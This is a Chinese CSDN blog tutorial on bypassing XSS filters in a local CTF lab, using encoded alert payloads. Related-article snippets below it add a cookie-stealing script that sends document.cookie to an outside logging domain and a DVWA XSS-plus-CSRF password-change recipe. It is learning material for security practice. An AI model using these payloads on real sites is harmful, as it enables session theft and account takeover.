了解一些xss漏洞绕过方式

最新推荐文章于 2024-03-28 22:00:00 发布
最新推荐文章于 2024-03-28 22:00:00 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 初级Web安全 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/swl412/article/details/128892887
版权

XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

1.1输入【http://localhost/xss.php】,点击提交可以看到题目过滤了XSS三个英文字母。如图1所示
在这里插入图片描述

图1
1.2输入<script>alert(String.fromCharCode(120, 115, 115))</script>可以绕过。如图2所示
在这里插入图片描述

图2
1.3点击提交会弹出flag。如图3所示
在这里插入图片描述

图3
1.4按f12打开调试器,在浏览器的console里面输入alert(‘xss’)即可。如图4所示
在这里插入图片描述

图4
1.5按回车会弹出flag。如图5所示
在这里插入图片描述
图5
1.6访问19【2.168.1.3/flag.php?msg=xss】即可获取flag。如图6
在这里插入图片描述

图6
1.7使用分号“;”截断 <script>alert("XSS");;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>。如图7所示
在这里插入图片描述

图7
1.8然后弹出flag。如图8所示
在这里插入图片描述

图8

贝隆驿站
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用xss平台的payload输入留言即可获得flag
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-26 1512
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top:利用xss平台的payload输入留言即可获得flag categories: CTFHUB刷题 tags:利用xss平台的payload输入留言即可获得flag 网络安全,CTFHUB,CTFHUB------XSS 反射型xss题目 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 利用xss平台的payload输入留言
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全XSS过滤器。
Web应用进行XSS漏洞测试
03-03
WEB应用进行XSS漏洞测试,不能仅仅局限于在WEB页面输入XSS攻击字段,然后提交。绕过JavaScript的检测,输入XSS脚本,通常被测试人员忽略。下图为XSS恶意输入绕过JavaScript检测的攻击路径。XSS输入通常包含JavaScript脚本,如弹出恶意警告框:<script>alert("XSS");</script>XSS输入也可能是HTML代码段,譬如:网页不停地刷新<metahttp-equiv="refresh"content="0;">嵌入其它网站的链接<iframesrc=http://xxxxwidth=250heigh
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
webug--XSS
gclome的博客
06-03 614
9 反射型xss 将1换成<script>alert('xss')</script>,成功弹框! 可是怎么找flag呢? 猜测在cookie文件里,于是使用<script>alert(document.cookie)</script> 弹出flag! 10 存储型xss 这一关有点鸡肋,访问进去,找到留言框,输入<script>alert(xss)</script>,就把这两关的flag全部弹了出来 12 DOM型xss 访问链接,先输
Web安全xss
白木乔
07-03 818
1&gt;XSS漏洞Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么就存在XSS漏洞。这个利用XSS漏洞的病毒之所以具有重要意义是因为,难以看到XSS漏洞的威胁,而该病毒则将其发挥得淋漓尽致。2&gt;XSS攻击分为两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。3&gt;另一类则是...
XSS绕过(弹窗拿flag
qq_48550824的博客
08-05 318
XSS简介及绕过方法介绍
CTF | 试试XSS
qq_42646885的博客
07-09 1873
进入合天网安实验室的实验机,打开网址只显示一个输入框,并提示alert document.domain。 尝试在在输入框输入<script>alert(document.domain)</script> 提交以后页面页面刷新了。再尝试输入<、>,’,"符号。发现在输入'和''时,页面多出了一个Img标签。 当输入'zzzzz时,zzzzz成...
CTFer成长之路之XSS的魔力
众生度尽,方证菩提
02-24 599
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
使用xss来打cookie
weixin_60719780的博客
11-11 1051
在我们的xss平台上,我们就可以收到一条信息,这也就说明了我们成功拿到cookie值,里面包含了cookie值;下来我们就可以使用cookie值进行登录,无需密码验证,到这里是不是感觉很爽。这里我们使用安全等级低的来做,使用xss存储型,只要大家能够绕过安全的等级(后面我会将存储型的三个等级绕过方式整理出来)下来我们重新使用一个浏览器打开我们的dvwa靶机,找到检查,找到cookie,进行修改。2、这里面有许多模块,自己选择所需要的就行,这里我使用的是默认模块。成功用cookie登录。
论文研究-一种绕过应用防火墙过滤规则的XSS漏洞自动化检测方法 .pdf
08-16
一种绕过应用防火墙过滤规则的XSS漏洞自动化检测方法,陆廷宇,李祺,XSS漏洞作为Web应用系统中重要的安全问题仍然具有非常高的危害性,随着应用防火墙等安全防护手段的介入,黑盒漏洞检测再次变成主流
CTFHub——XSS
最新发布
2302_79119987的博客
03-28 600
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1711
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
CTFHub靶场————XSS
qq_61579604的博客
10-17 189
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。
安全】P 4-1 XSS跨站脚本分类
Z_David_Z的博客
02-17 270
目录0X01 XSS漏洞介绍0X02 反射型XSS0X03 存储型XSS0X04 DOM型XSS 0X01 XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 0X02 反射型XSS 反射型XSS又称非持久性XSS,这种攻击
XSS漏洞
hintll的博客
09-12 387
XSS漏洞 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS攻击的危害包括 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力 3、盗窃企业重要的具有商业价值的资料 4、非法转账 5、强制发送电子邮件 6、网站挂马 7、控
CTFHUB------XSS
qq_45616570的博客
06-23 706
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top: categories: CTFHUB刷题 tags: 网络安全 CTFHUB CTFHUB------XSS 反射型xss 题目 解题思路 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 解题过程 1.创建xss平台项目 2.点击下一步,勾选默认模块 3.点击下图中的一个作为反射型的变量值 4.返回题.
利用XSS漏洞打cookie
qq_68163788的博客
01-15 1396
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
ctfshow web入门 xss
blowed的博客
01-01 643
xss
dvwa中利用xss漏洞绕过csrf漏洞
05-20
在DVWA中,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题中,我们可以插入一段XSS代码,例如:`<script>document.forms[0].submit();</script>`。这段代码将会自动提交我们的表单。 3. 然后,在新帖子的内容中,我们可以插入一个隐藏的表单,该表单将执行一个CSRF攻击。例如:`<form action="http://localhost/dvwa/vulnerabilities/csrf/" method="post"><input type="hidden" name="password_new" value="newpassword"><input type="hidden" name="password_conf" value="newpassword"><input type="hidden" name="Change" value="Change"></form>`。 4. 最后,我们将在新帖子中插入一个图片,该图片的源地址指向我们刚刚创建的表单。例如:`<img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=newpassword&password_conf=newpassword&Change=Change" width="1" height="1">`。 5. 提交这个新帖子后,XSS代码将自动执行,并且隐藏的表单将会被提交,从而完成了CSRF攻击。 需要注意的是,这种方法只能用于绕过一些较为简单的CSRF防御措施,对于一些较为严格的防御措施是无效的。因此,在实际应用中,我们应该采取更为严格的防御措施,以确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值